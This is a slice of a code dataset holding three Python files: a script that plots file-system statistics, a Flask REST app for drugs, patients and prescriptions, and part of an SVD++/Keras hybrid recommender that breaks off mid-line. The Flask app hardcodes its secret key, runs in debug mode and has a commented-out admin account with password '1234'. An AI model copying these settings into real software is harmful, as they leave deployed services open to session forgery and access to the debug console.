p[2]\n linestyle = p[3]\n\n ax.plot(x_val_dates, y_vals[key_name], linestyle, linewidth=2, color=col, label=key_name)\n\n if source_type == \"ECFS\":\n ax.legend(loc=\"lower right\") \n else:\n #MARS\n ax.legend(loc=\"center left\") \n\n ylabela = ax.set_ylabel('Percent of existing files', fontsize=24)\n \n #============ DATE FORMATTING =================\n ax.xaxis.set_major_locator(dates.MonthLocator(bymonth=[1,4,7,10]))\n ax.xaxis.set_minor_locator(dates.MonthLocator(interval=1))\n ax.xaxis.set_major_formatter(dates.DateFormatter('%Y/%m'))\n \n ax.yaxis.grid(True)\n ax.xaxis.grid(True)\n \n sizes = fig.get_size_inches()\n fig.set_size_inches(sizes[0]*1.5, sizes[1])\n\n pyplot.tight_layout()\n outfile = os.path.join(target_graph_dir, \"unaccessed_files_plot_2.pdf\")\n pyplot.savefig(outfile, bbox_extra_artists=[ylabela], bbox_inches='tight')\n print(\"saved %s\" % (outfile))\n pyplot.close()\n\n\ndef cdf_file_sizes_capacity(outfile):\n\n x_vals = np.arange(1, len(total_size_per_size_category) + 1)\n\n y_temp = 0\n y_vals = list()\n for v in [to_petabyte(total_size_per_size_category[x]) for x in sorted(total_size_per_size_category.iterkeys())]:\n y_temp += v\n y_vals.append(y_temp)\n \n fig, ax = pyplot.subplots()\n \n \n ax.plot(x_vals, y_vals, \"-\", linewidth=2, color='b')\n\n ax.set_ylabel('Total Capcity in PB', fontsize=20)\n \n labels = [get_group_name(x) for x in sorted(total_size_per_size_category.iterkeys())]\n ax.set_xticks(x_vals)\n ax.set_xticklabels(labels, rotation=90)\n ax.tick_params(labelsize=14)\n ax.set_xlim(1,len(total_size_per_size_category)+1)\n ax.yaxis.grid(True)\n ax.xaxis.grid(True)\n \n sizes = fig.get_size_inches()\n fig.set_size_inches(sizes[0]*1.3, sizes[1])\n\n pyplot.tight_layout()\n pyplot.savefig(outfile)\n print(\"saved %s\" % (outfile))\n pyplot.close()\n\ndef histrogram_of_file_sizes(target_file):\n fig, ax = pyplot.subplots()\n # print (data)\n # num_files_per_size_category\n \n x_pos = np.arange(1, len(num_files_per_size_category) + 1)\n\n y_vals = [to_millions(num_files_per_size_category[x]) for x in sorted(num_files_per_size_category.iterkeys())]\n\n pyplot.bar(x_pos, y_vals, width=0.8, align='center', color=\"0.5\")\n\n labels = [get_group_name(x) for x in sorted(num_files_per_size_category.iterkeys())]\n\n # a = ax.get_xticks().tolist()\n # print(a)\n\n ax.set_xticks(x_pos)\n ax.set_xticklabels(labels, rotation=90)\n ax.tick_params(labelsize=14)\n ax.set_ylabel('Number of files in mil', fontsize=24)\n # ax.set_xlabel('File size group', fontsize=24)\n\n # We change the fontsize of minor ticks label \n ax.yaxis.grid(True)\n # ax2.yaxis.grid(True)\n # ax.xaxis.grid(True)\n\n sizes = fig.get_size_inches()\n fig.set_size_inches(sizes[0]*1.2, sizes[1])\n\n pyplot.tight_layout()\n \n pyplot.savefig(target_file)\n print(\"saved %s\" % (target_file))\n pyplot.close()\n\n\n\n\ndef stats_to_latex_table(target_file, source_type=\"ECFS\"):\n with open(target_file, 'wt') as tf:\n tf.write(\"\\\\begin{table}[ht!]\\n\")\n tf.write(\"\\\\scriptsize\\n\")\n tf.write(\"\\\\centering\\n\")\n tf.write(\"{\\n\")\n tf.write(\"\\\\begin{tabular}{|r|r|}\\n\")\n tf.write(\"\\\\hline\\n\")\n tf.write(\"\\\\multicolumn{2}{|c|}{\\\\textbf{File system stats}}\\\\\\\\\\\\hline\\n\")\n tf.write(\"Total \\#files & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(stats[\"total_files\"])))\n tf.write(\"Total used capacity & %s\\\\,PB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_petabyte(stats[\"total_size\"]))))\n tf.write(\"Max file size & %s\\\\,GB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_gigabyte(stats[\"max_file_size\"]))))\n tf.write(\"\\#Directories& %s\\\\\\\\\\\\hline\\n\" % (prettyfy(len(files_per_dir_counter))))\n \n max_files_per_dir = files_per_dir_counter.most_common(1)[0][1]\n tf.write(\"Max files per directory & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(max_files_per_dir)))\n\n tf.write(\"\\#Files never read & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(stats[\"unread_files_cnt\"])))\n tf.write(\"Capacity of never read files & %s\\\\,PB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_petabyte(stats[\"unread_files_size\"]))))\n tf.write(\"\\\\hline\\n\")\n \n if source_type == \"ECFS\":\n # most common file extensions, and how much space they take\n \n tf.write(\"\\\\multicolumn{2}{|c|}{\\\\textbf{Most common file types}}\\\\\\\\\\\\hline\\n\")\n tf.write(\"\\\\textbf{by file count} & \\\\textbf{by used capacity}\\\\\\\\\\\\hline\\n\")\n \n by_count = file_extension_cnt.most_common(10)\n by_size = file_extension_size.most_common(10)\n\n for i in range(min(len(by_count), len(by_size))):\n tf.write(\"%s (%.4f%s) & %s (%.4f%s)\\\\\\\\\\\\hline\\n\" % (\n by_count[i][0],\n float(by_count[i][1]) / stats[\"total_files\"] * 100,\n \"\\%\",\n by_size[i][0],\n float(by_size[i][1]) / stats[\"total_size\"] * 100,\n \"\\%\"\n ))\n tf.write(\"\\\\end{tabular}\\n\")\n tf.write(\"}\\n\")\n\n \n tf.write(\"\\\\caption{ECFS file system statistics}\\n\")\n tf.write(\"\\\\label{table:ecfs_db_file_types_statistics}\\n\")\n else:\n tf.write(\"\\\\caption{MARS file system statistics}\\n\")\n tf.write(\"\\\\label{table:mars_db_file_types_statistics}\\n\")\n tf.write(\"\\\\end{table}\\n\")\n\n print(\"wrote: %s\" % (target_file))\n\ndef store_stats(stats_file):\n\n # print(json.dumps(stats, indent=2, sort_keys=True))\n # print(json.dumps(num_files_per_size_category, indent=2, sort_keys=True))\n # print(json.dumps(file_extension_cnt, indent=2, sort_keys=True))\n # print(json.dumps(file_extension_size, indent=2, sort_keys=True))\n \n s = dict()\n\n s[\"stats\"] = stats\n s[\"num_files_per_size_category\"] = num_files_per_size_category\n s[\"file_extension_cnt\"] = file_extension_cnt\n s[\"file_extension_size\"] = file_extension_size\n\n with open(stats_file, 'wt') as sf:\n json.dump(s, sf, indent=4, sort_keys=True)\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 4:\n print(\"usage: %s source_file target.gz\" % sys.argv[0])\n sys.exit(1)\n\n source_file = os.path.abspath(sys.argv[1])\n target_graph_dir = os.path.abspath(sys.argv[2])\n source_type = sys.argv[3]\n\n\n print(\"source_file == %s\" % (source_file))\n print(\"target_graph_dir == %s\" % (target_graph_dir))\n print(\"source_type == %s\" % (source_type))\n\n if not os.path.exists(source_file):\n print(\"source: %s does not exist\" % source_file)\n sys.exit(1)\n\n if not os.path.exists(target_graph_dir):\n print(\"target_graph_dir: does not exist: %s\" % target_graph_dir)\n sys.exit(1)\n\n with Timer(\"Loading data\"):\n if source_type == \"ECFS\":\n print(\"loading ECFS\")\n log_start=\"20140905-000000\"\n else:\n print(\"loading MARS\")\n log_start=\"20140904-000000\"\n\n # load(source_file, max_lines=1000000, log_start=log_start)\n load(source_file, log_start=log_start)\n\n with Timer(\"Plot unaccessed Files\"):\n unaccessed_files_plot(target_graph_dir, log_start, source_type)\n\n # with Timer(\"Plot unaccessed Files\"):\n # unaccessed_files_plot_2(os.path.join(target_graph_dir, \"unaccessed_files_plot_2.pdf\"), log_start, source_type)\n\n with Timer(\"Plot histrogram of File Sizes\"):\n histrogram_of_file_sizes(os.path.join(target_graph_dir, \"histogram_file_sizes.pdf\"))\n \n with Timer(\"Plot CDF over File Sizes\"):\n cdf_file_sizes_capacity(os.path.join(target_graph_dir, \"cdf_over_file_sizes.pdf\"))\n \n stats_to_latex_table(os.path.join(target_graph_dir, \"db_stats.tex\"), source_type)\n\n with Timer(\"Store stats\"):\n store_stats(os.path.join(target_graph_dir, \"stats.json\"))\n","sub_path":"hpss_db_dump/src/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":18789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"36819118","text":"from flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt_extended import JWTManager\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom db import db\nfrom ma import ma\nfrom blacklist import BLACKLIST\nfrom resources.user import UserRegister, UserLogin, User, UserLogout, Users\nfrom resources.role import UserRole, UserRoles\nfrom resources.drug import Drugs, Drug, RegisterDrug, DoctorDrug, DrugName\nfrom resources.patient import PatientSearchById, Patient, Patients, PatientSearchByNationalId\nfrom resources.recipe import Recipe, SearchRecipeById, RecipeSpend\n\napp = Flask(__name__)\napp.secret_key = \"you will never gi ss password\"\napp.config.from_object(\"config\")\nCORS(app)\ndb = SQLAlchemy(app)\n\napi = Api(app)\n\njwt = JWTManager(app)\n\n\n@jwt.token_in_blacklist_loader\ndef check_if_token_in_blacklist(decrypted_token):\n return (\n decrypted_token[\"jti\"] in BLACKLIST\n )\n\n\n\"\"\" User Api \"\"\"\napi.add_resource(UserRegister, \"/register\")\napi.add_resource(UserLogin, \"/login\")\napi.add_resource(UserLogout, \"/logout\")\n\napi.add_resource(Users, \"/users\")\napi.add_resource(User, \"/user/\")\n\n\"\"\" Roles Api \"\"\"\napi.add_resource(UserRole, '/role')\napi.add_resource(UserRoles, '/roles')\n\n\"\"\" Drugs \"\"\"\napi.add_resource(Drugs, '/drugs')\napi.add_resource(RegisterDrug, '/drug')\napi.add_resource(Drug, '/drug/')\napi.add_resource(DrugName, '/drug/')\napi.add_resource(DoctorDrug, '/doctor_drug')\n\n\"\"\" search by id search national_id add patient add recipe \"\"\"\n\"\"\" Doctor Api \"\"\"\napi.add_resource(PatientSearchById, '/search')\napi.add_resource(PatientSearchByNationalId, '/search/national_id')\napi.add_resource(Patient, '/patient')\napi.add_resource(Patients, '/patients')\n\napi.add_resource(Recipe, '/recipe')\napi.add_resource(SearchRecipeById, '/recipe/search/')\napi.add_resource(RecipeSpend, '/recipe_spend')\n\n\n# @app.before_first_request\n# def create_tables():\n# role = RoleModel(name='admin')\n# # pharmacy = RoleModel(name='pharmacy')\n# # pharmacy.save_to_db()\n# # doctor = RoleModel(name='doctor')\n# # doctor.save_to_db()\n#\n# role.save_to_db()\n# admin = UserModel(username='admin', email='admin@admin.com', password='1234', role_id=role.id)\n# admin.save_to_db()\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db.session.remove()\n\n\nif __name__ == \"__main__\":\n db.init_app(app)\n ma.init_app(app)\n app.run(port=5000, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188012416","text":"import operator\nimport time\nfrom collections import Counter\nfrom typing import List, Dict, Tuple, Optional\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom bidict import bidict\nfrom more_itertools import flatten\nfrom sklearn.model_selection import StratifiedKFold\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise import SVDpp\nfrom tensorflow import keras\n\nfrom .hybrid_recommender import HybridRecommender\nfrom .logging import getLogger\nfrom .recommendation_base import EntityType\nfrom .utils import normalize_affinity_scores_by_user_item, RatingPredRegularization, get_rng, \\\n LRSchedule, resnet_layer_with_content, ScaledGlorotNormal, root_mean_squared_error, mean_absolute_error, \\\n normalize_affinity_scores_by_user_item_bs\n\n\nclass HybridRecommenderSVDpp(HybridRecommender):\n def __init__(self, embedding_mapper: dict, knn_params: Optional[dict], rating_scale: Tuple[float, float],\n n_content_dims: int = 32, n_collaborative_dims: int = 32):\n super().__init__(embedding_mapper, knn_params, rating_scale, n_content_dims, n_collaborative_dims)\n self.log = getLogger(type(self).__name__)\n\n def __build_svd_model__(self, user_item_affinities, svdpp, rating_scale, user_ids, item_ids, n_folds=1):\n start = time.time()\n models = []\n svd_uv, svd_iv = None, None\n affinities = []\n reader = Reader(rating_scale=rating_scale)\n rng_state = np.random.get_state()\n random_int = np.random.randint(1e8)\n assert n_folds >= 1\n\n def train_svd(train_affinities, ):\n svd_train = pd.DataFrame(train_affinities)\n svd_train = Dataset.load_from_df(svd_train, reader).build_full_trainset()\n np.random.set_state(rng_state)\n svd_model = SVDpp(random_state=random_int, **svdpp)\n svd_model.fit(svd_train)\n\n svd_inner_users = [svd_model.trainset.to_inner_uid(u) if svd_model.trainset.knows_user(u) else \"\"\n for\n u in user_ids]\n svd_known_users = [svd_model.trainset.knows_user(u) for u in svd_inner_users]\n svd_uv_1 = np.vstack([svd_model.pu[u] if k else np.random.rand(svdpp['n_factors']) * 0.001 for u, k in\n zip(svd_inner_users, svd_known_users)])\n\n svd_inner_items = [svd_model.trainset.to_inner_iid(i) if svd_model.trainset.knows_item(i) else \"\"\n for\n i in item_ids]\n svd_known_items = [svd_model.trainset.knows_item(i) for i in svd_inner_items]\n svd_iv_1 = np.vstack([svd_model.qi[i] if k else np.random.rand(svdpp['n_factors']) * 0.001 for i, k in\n zip(svd_inner_items, svd_known_items)])\n return svd_model, svd_uv_1, svd_iv_1\n\n if n_folds == 1:\n svd_model, svd_uv, svd_iv = train_svd(user_item_affinities)\n svd_validation = pd.DataFrame(user_item_affinities)\n svd_validation = Dataset.load_from_df(svd_validation, reader).build_full_trainset().build_testset()\n svd_predictions = svd_model.test(svd_validation)\n validation_affinities = [(p.uid, p.iid, p.r_ui - p.est) for p in svd_predictions]\n affinities = validation_affinities\n models.append(svd_model)\n\n else:\n user_item_affinities = np.array(user_item_affinities)\n users_for_each_rating = np.array([u for u, i, r in user_item_affinities])\n X, y = user_item_affinities, users_for_each_rating\n skf = StratifiedKFold(n_splits=n_folds)\n for train_index, test_index in skf.split(X, y):\n train_affinities, validation_affinities = X[train_index], X[test_index]\n train_affinities = [(u, i, int(r)) for u, i, r in train_affinities]\n svd_model, svd_uv_1, svd_iv_1 = train_svd(train_affinities)\n models.append(svd_model)\n if svd_uv is None:\n svd_uv = svd_uv_1\n else:\n svd_uv = np.concatenate((svd_uv, svd_uv_1), axis=1)\n\n if svd_iv is None:\n svd_iv = svd_iv_1\n else:\n svd_iv = np.concatenate((svd_iv, svd_iv_1), axis=1)\n\n validation_affinities = [(u, i, int(r)) for u, i, r in validation_affinities]\n svd_validation = pd.DataFrame(validation_affinities)\n svd_validation = Dataset.load_from_df(svd_validation, reader).build_full_trainset().build_testset()\n svd_predictions = svd_model.test(svd_validation)\n validation_affinities = [(p.uid, p.iid, p.r_ui - p.est) for p in svd_predictions]\n affinities.extend(validation_affinities)\n\n #\n assert len(models) == n_folds\n self.log.debug(\"Training %s SVD Models in time = %.1f\", len(models), time.time() - start)\n return models, svd_uv, svd_iv, affinities\n\n def __build_dataset__(self, user_ids: List[str], item_ids: List[str],\n user_item_affinities: List[Tuple[str, str, float]],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n rating_scale: Tuple[float, float], hyperparams: Dict):\n batch_size = hyperparams[\"batch_size\"] if \"batch_size\" in hyperparams else 512\n use_svd = hyperparams[\"use_svd\"] if \"use_svd\" in hyperparams else False\n svdpp = hyperparams[\"svdpp\"] if \"svdpp\" in hyperparams else {\"n_factors\": 8, \"n_epochs\": 10}\n n_svd_folds = hyperparams[\"n_svd_folds\"] if \"n_svd_folds\" in hyperparams else 5\n padding_length = hyperparams[\"padding_length\"] if \"padding_length\" in hyperparams else 100\n n_content_dims = user_content_vectors.shape[1]\n n_collaborative_dims = user_vectors.shape[1]\n\n noise_augmentation = hyperparams[\"noise_augmentation\"] if \"noise_augmentation\" in hyperparams else False\n rng = get_rng(noise_augmentation)\n user_content_vectors_mean = np.mean(user_content_vectors)\n item_content_vectors_mean = np.mean(item_content_vectors)\n user_vectors_mean = np.mean(user_vectors)\n item_vectors_mean = np.mean(item_vectors)\n self.log.debug(\n \"For rng regularization, user_content_vectors_mean = %s, item_content_vectors_mean = %s, user_vectors_mean = %s, item_vectors_mean = %s\",\n user_content_vectors_mean, item_content_vectors_mean, user_vectors_mean, item_vectors_mean)\n\n if use_svd:\n models, svd_uv, svd_iv, user_item_affinities = self.__build_svd_model__(\n user_item_affinities, svdpp, rating_scale, user_ids, item_ids, n_svd_folds)\n assert len(models) == n_svd_folds\n else:\n models, svd_uv, svd_iv = [], np.zeros((len(user_ids), 1)), np.zeros((len(item_ids), 1))\n n_svd_dims = svd_uv.shape[1]\n assert svd_iv.shape[1] == svd_uv.shape[1]\n user_svd_mean = np.mean(svd_uv)\n item_svd_mean = np.mean(svd_iv)\n ###\n ratings = np.array([r for u, i, r in user_item_affinities])\n min_affinity = np.min(ratings)\n max_affinity = np.max(ratings)\n affinity_range = max_affinity - min_affinity\n # user_item_affinities = [(u, i, (2 * (r - min_affinity) / (max_affinity - min_affinity)) - 1) for u, i, r in\n # user_item_affinities]\n mu, user_bias, item_bias, _, _ = normalize_affinity_scores_by_user_item_bs(user_item_affinities, rating_scale)\n\n def inverse_fn(user_item_predictions):\n rscaled = np.array([r for u, i, r in user_item_predictions])\n # rscaled = ((rscaled + 1) / 2) * (max_affinity - min_affinity) + min_affinity\n if use_svd:\n svd_predictions = np.array(\n [[model.predict(u, i).est for model in models] for u, i, r in\n user_item_predictions])\n svd_predictions = np.array(svd_predictions).mean(axis=1)\n rscaled = rscaled + svd_predictions\n return rscaled\n\n user_bias = np.array([user_bias[u] if u in user_bias else np.random.rand() * 0.01 for u in user_ids])\n item_bias = np.array([item_bias[i] if i in item_bias else np.random.rand() * 0.01 for i in item_ids])\n self.log.debug(\"Mu = %.4f, Max User Bias = %.4f, Max Item Bias = %.4f, use_svd = %s, min-max-affinity = %s\",\n mu, np.abs(np.max(user_bias)),\n np.abs(np.max(item_bias)), use_svd, (min_affinity, max_affinity))\n\n ratings_count_by_user = Counter([u for u, i, r in user_item_affinities])\n ratings_count_by_item = Counter([i for u, i, r in user_item_affinities])\n\n user_item_list = defaultdict(list)\n item_user_list = defaultdict(list)\n for i, j, r in user_item_affinities:\n user_item_list[i].append(item_id_to_index[j])\n item_user_list[j].append(user_id_to_index[i])\n\n user_item_affinities = list(sorted(user_item_affinities, key=operator.itemgetter(0)))\n\n def generate_training_samples(affinities: List[Tuple[str, str, float]]):\n def generator():\n for i, j, r in affinities:\n user = user_id_to_index[i]\n item = item_id_to_index[j]\n items = np.array(user_item_list[i])\n items = items[:padding_length]\n items = items + 1\n items = np.pad(items, (padding_length - len(items), 0), constant_values=(0, 0))\n\n users = np.array(item_user_list[j])\n users = users[:padding_length]\n users = users + 1\n users = np.pad(users, (padding_length - len(users), 0), constant_values=(0, 0))\n\n user_content = user_content_vectors[user] + rng(n_content_dims, 0.001 * user_content_vectors_mean)\n item_content = item_content_vectors[item] + rng(n_content_dims, 0.001 * item_content_vectors_mean)\n user_collab = user_vectors[user] + rng(n_collaborative_dims, 0.001 * user_vectors_mean)\n item_collab = item_vectors[item] + rng(n_collaborative_dims, 0.001 * item_vectors_mean)\n r = r + rng(1, 0.01 * affinity_range)\n\n ratings_by_user = np.log1p((ratings_count_by_user[i] + 10.0) / 10.0)\n ratings_by_item = np.log1p((ratings_count_by_item[j] + 10.0) / 10.0)\n nu = 1 / np.sqrt(ratings_count_by_user[i])\n ni = 1 / np.sqrt(ratings_count_by_item[j])\n if use_svd:\n user_svd = svd_uv[user] + rng(n_svd_dims, 0.001 * user_svd_mean)\n item_svd = svd_iv[item] + rng(n_svd_dims, 0.001 * item_svd_mean)\n yield (user, item, users, items, nu, ni, user_content, item_content, user_collab, item_collab,\n user_svd, item_svd, ratings_by_user, ratings_by_item), r\n else:\n yield (user, item, users, items, nu, ni, user_content, item_content, user_collab, item_collab,\n ratings_by_user, ratings_by_item), r\n\n return generator\n\n if use_svd:\n output_shapes = (\n ((), (), padding_length, padding_length, (), (), n_content_dims, n_content_dims, n_collaborative_dims,\n n_collaborative_dims,\n n_svd_dims,\n n_svd_dims, (), ()),\n ())\n output_types = (\n (tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64,\n tf.float64,\n tf.float64, tf.float64),\n tf.float64)\n else:\n output_shapes = (\n ((), (), padding_length, padding_length, (), (), n_content_dims, n_content_dims, n_collaborative_dims,\n n_collaborative_dims,\n (), ()),\n ())\n output_types = (\n (tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64,\n tf.float64, tf.float64),\n tf.float64)\n\n s = time.time()\n _ = [i for i in generate_training_samples(user_item_affinities)()]\n e = time.time()\n self.log.debug(\"Total time to Run Training Generator 1 EPOCH = %.1f\", e - s)\n train = tf.data.Dataset.from_generator(generate_training_samples(user_item_affinities),\n output_types=output_types, output_shapes=output_shapes, )\n\n train = train.batch(batch_size).shuffle(32).prefetch(32)\n return mu, user_bias, item_bias, inverse_fn, train, n_svd_dims, \\\n ratings_count_by_user, ratings_count_by_item, svd_uv, svd_iv, \\\n min_affinity, max_affinity, user_item_list, item_user_list\n\n def __build_prediction_network__(self, user_ids: List[str], item_ids: List[str],\n user_item_affinities: List[Tuple[str, str, float]],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n rating_scale: Tuple[float, float], hyperparams: Dict):\n self.log.debug(\n \"Start Building Prediction Network, collaborative vectors shape = %s, content vectors shape = %s\",\n (user_vectors.shape, item_vectors.shape), (user_content_vectors.shape, item_content_vectors.shape))\n\n lr = hyperparams[\"lr\"] if \"lr\" in hyperparams else 0.001\n epochs = hyperparams[\"epochs\"] if \"epochs\" in hyperparams else 15\n batch_size = hyperparams[\"batch_size\"] if \"batch_size\" in hyperparams else 512\n network_width = hyperparams[\"network_width\"] if \"network_width\" in hyperparams else 2\n network_depth = hyperparams[\"network_depth\"] if \"network_depth\" in hyperparams else 3\n verbose = hyperparams[\"verbose\"] if \"verbose\" in hyperparams else 1\n kernel_l2 = hyperparams[\"kernel_l2\"] if \"kernel_l2\" in hyperparams else 0.0\n bias_regularizer = hyperparams[\"bias_regularizer\"] if \"bias_regularizer\" in hyperparams else 0.0\n rating_regularizer = hyperparams[\"rating_regularizer\"] if \"rating_regularizer\" in hyperparams else 0.0\n dropout = hyperparams[\"dropout\"] if \"dropout\" in hyperparams else 0.0\n use_svd = hyperparams[\"use_svd\"] if \"use_svd\" in hyperparams else False\n use_implicit = hyperparams[\"use_implicit\"] if \"use_implicit\" in hyperparams else False\n use_dnn = hyperparams[\"use_dnn\"] if \"use_dnn\" in hyperparams else False\n padding_length = hyperparams[\"padding_length\"] if \"padding_length\" in hyperparams else 100\n\n use_resnet = hyperparams[\"use_resnet\"] if \"use_resnet\" in hyperparams else False\n resnet_content_each_layer = hyperparams[\n \"resnet_content_each_layer\"] if \"resnet_content_each_layer\" in hyperparams else False\n\n n_content_dims = user_content_vectors.shape[1]\n n_collaborative_dims = user_vectors.shape[1]\n\n assert user_content_vectors.shape[1] == item_content_vectors.shape[1]\n assert user_vectors.shape[1] == item_vectors.shape[1]\n\n mu, user_bias, item_bias, inverse_fn, train, \\\n n_svd_dims, ratings_count_by_user, ratings_count_by_item, \\\n svd_uv, svd_iv, min_affinity, \\\n max_affinity, user_item_list, item_user_list = self.__build_dataset__(user_ids, item_ids,\n user_item_affinities,\n user_content_vectors,\n item_content_vectors,\n user_vectors, item_vectors,\n user_id_to_index,\n item_id_to_index,\n rating_scale, hyperparams)\n assert svd_uv.shape[1] == svd_iv.shape[1] == n_svd_dims\n self.log.debug(\"DataSet Built with n_svd_dims = %s, use_svd = %s\", n_svd_dims, use_svd)\n input_user = keras.Input(shape=(1,))\n input_item = keras.Input(shape=(1,))\n input_users = keras.Input(shape=(padding_length,))\n input_items = keras.Input(shape=(padding_length,))\n input_nu = keras.Input(shape=(1,))\n input_ni = keras.Input(shape=(1,))\n\n input_1 = keras.Input(shape=(n_content_dims,))\n input_2 = keras.Input(shape=(n_content_dims,))\n input_3 = keras.Input(shape=(n_collaborative_dims,))\n input_4 = keras.Input(shape=(n_collaborative_dims,))\n input_5 = keras.Input(shape=(1,))\n input_6 = keras.Input(shape=(1,))\n inputs = [input_user, input_item, input_users, input_items,\n input_nu, input_ni, input_1, input_2, input_3, input_4, input_5, input_6]\n if use_svd:\n input_svd_uv = keras.Input(shape=(n_svd_dims,))\n input_svd_iv = keras.Input(shape=(n_svd_dims,))\n inputs = [input_user, input_item, input_users, input_items,\n input_nu, input_ni, input_1, input_2, input_3, input_4, input_svd_uv,\n input_svd_iv,\n input_5, input_6]\n\n embeddings_initializer = tf.keras.initializers.Constant(user_bias)\n user_bias = keras.layers.Embedding(len(user_ids), 1, input_length=1,\n embeddings_initializer=embeddings_initializer)(input_user)\n\n item_initializer = tf.keras.initializers.Constant(item_bias)\n item_bias = keras.layers.Embedding(len(item_ids), 1, input_length=1,\n embeddings_initializer=item_initializer)(input_item)\n user_bias = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_bias)\n item_bias = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_bias)\n user_bias = tf.keras.layers.Flatten()(user_bias)\n item_bias = tf.keras.layers.Flatten()(item_bias)\n\n def main_network():\n initializer = tf.keras.initializers.TruncatedNormal(stddev=0.1)\n embeddings_initializer = tf.keras.initializers.Constant(user_vectors)\n user_vec = keras.layers.Embedding(len(user_ids), n_collaborative_dims, input_length=1)(input_user)\n\n item_initializer = tf.keras.initializers.Constant(item_vectors)\n item_vec = keras.layers.Embedding(len(item_ids), n_collaborative_dims, input_length=1,\n embeddings_initializer=initializer)(input_item)\n\n user_initializer = tf.keras.initializers.Constant(\n np.concatenate((np.array([[0.0] * n_collaborative_dims]), user_vectors), axis=0))\n user_vecs = keras.layers.Embedding(len(user_ids) + 1, n_collaborative_dims,\n input_length=padding_length, mask_zero=True)(input_users)\n user_vecs = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_vecs)\n user_vecs = tf.keras.layers.GlobalAveragePooling1D()(user_vecs)\n user_vecs = user_vecs * input_ni\n\n item_initializer = tf.keras.initializers.Constant(\n np.concatenate((np.array([[0.0] * n_collaborative_dims]), item_vectors), axis=0))\n item_vecs = keras.layers.Embedding(len(item_ids) + 1, n_collaborative_dims,\n input_length=padding_length, mask_zero=True,\n embeddings_initializer=initializer)(input_items)\n item_vecs = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_vecs)\n item_vecs = tf.keras.layers.GlobalAveragePooling1D()(item_vecs)\n item_vecs = item_vecs * input_nu\n\n user_vec = keras.layers.ActivityRegularization(l2=bias_regularizer)(user_vec)\n item_vec = keras.layers.ActivityRegularization(l2=bias_regularizer)(item_vec)\n user_vec = tf.keras.layers.Flatten()(user_vec)\n item_vec = tf.keras.layers.Flatten()(item_vec)\n user_item_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([user_vec, item_vec])\n item_items_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([item_vec, item_vecs])\n user_user_vec_dot = tf.keras.layers.Dot(axes=1, normalize=False)([user_vec, user_vecs])\n implicit_term = user_item_vec_dot + item_items_vec_dot + user_user_vec_dot\n\n user_content = input_1\n item_content = input_2\n user_collab = input_3\n item_collab = input_4\n\n user_item_content_similarity = tf.keras.layers.Dot(axes=1, normalize=True)([user_content, item_content])\n user_item_collab_similarity = tf.keras.layers.Dot(axes=1, normalize=True)([user_collab, item_collab])\n\n ratings_by_user = input_5\n ratings_by_item = input_6\n\n vectors = [user_content, item_content, user_collab, item_collab, user_vec, item_vec, item_vecs, user_vecs]\n counts_data = keras.layers.Dense(8, activation=\"tanh\", use_bias=False)(\n K.concatenate([ratings_by_user, ratings_by_item, input_nu, input_ni, ]))\n meta_data = [counts_data, user_item_content_similarity, user_item_collab_similarity,\n item_bias, user_bias, implicit_term, item_items_vec_dot, user_item_vec_dot, user_user_vec_dot]\n if use_svd:\n user_svd = input_svd_uv\n item_svd = input_svd_iv\n user_item_svd_similarity = tf.keras.layers.Dot(axes=1, normalize=False)([user_svd, item_svd])\n vectors.extend([user_svd, item_svd])\n meta_data.append(user_item_svd_similarity)\n\n vectors = K.concatenate(vectors)\n meta_data = K.concatenate(meta_data)\n meta_data = keras.layers.Dense(64, activation=\"tanh\", )(meta_data)\n\n dense_representation = K.concatenate([meta_data, vectors])\n # dense_representation = tf.keras.layers.BatchNormalization()(dense_representation)\n initial_dense_representation = dense_representation if resnet_content_each_layer else None\n self.log.info(\"Start Training: lr = %.5f, use_dnn = %s, use_implicit = %s,use_svd = %s, \" +\n \"use_resnet = %s, dense_dims = %s, vector shape = %s, \" +\n \"network_depth = %s, network width = %s, dropout = %.2f, \",\n lr, use_dnn, use_implicit, use_svd, use_resnet,\n dense_representation.shape, vectors.shape,\n network_depth, network_width, dropout)\n\n dims_fn = lambda x: int(\n np.interp(x, [0, network_depth - 1], [dense_representation.shape[1] * 2, network_width]))\n for i in range(0, network_depth):\n dims = dims_fn(i)\n if use_resnet:\n dense_representation = resnet_layer_with_content(dims, dims, dropout, kernel_l2)(\n dense_representation, initial_dense_representation)\n\n else:\n dense_representation = keras.layers.Dense(dims, activation=\"tanh\", use_bias=False,\n kernel_initializer=ScaledGlorotNormal(),\n kernel_regularizer=keras.regularizers.l1_l2(\n l2=kernel_l2))(\n dense_representation)\n # dense_representation = tf.keras.layers.BatchNormalization()(dense_representation)\n dense_representation = 